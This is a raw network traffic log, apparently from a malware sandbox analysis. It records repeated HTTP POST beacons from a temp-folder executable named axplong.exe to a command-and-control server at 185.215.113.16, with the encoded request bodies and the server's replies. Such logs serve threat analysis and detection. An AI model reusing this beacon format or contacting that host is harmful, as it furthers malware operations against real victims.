                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:40.658236027 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:40.659076929 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:40.900990009 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.453687185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:41.021311045 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:41.718357086 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:41.720546961 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:41.943465948 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.453688185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:42.052902937 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:42.864432096 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:42.865288019 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:43.087995052 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    36192.168.2.453689185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:43.208861113 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:43.918236017 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:43.922761917 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:44.148511887 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    37192.168.2.453690185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:44.255822897 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:44.964474916 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:44.976711988 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:45.206270933 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    38192.168.2.453691185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:45.321666002 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:46.028835058 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:45 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:46.031699896 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:46.262418032 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    39192.168.2.453692185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:46.380853891 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:47.098800898 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:47.100455999 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:47.330893040 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:47 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    40192.168.2.453693185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:47.443898916 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:48.173223972 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:48.173963070 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:48.603090048 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:48 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    41192.168.2.453694185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:48.724303007 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:49.413585901 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:49.416544914 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:49.639203072 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    42192.168.2.453695185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:50.002728939 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:50.710978985 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:50.715487957 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:50.945640087 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:50 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    43192.168.2.453696185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:51.052850962 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:51.768160105 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:51 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:51.769032001 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:52.185519934 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    44192.168.2.453697185.215.113.16806340C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 08:41:52.305027962 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 08:41:53.605277061 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:53.605401993 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:53.605456114 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:52 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 08:41:53.606184006 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 46 34 30 43 39 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8AF40C9FEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Sep 27, 2024 08:41:53.836357117 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 06:41:53 GMT
                    Content-Type: text/html; charset=UTF-8
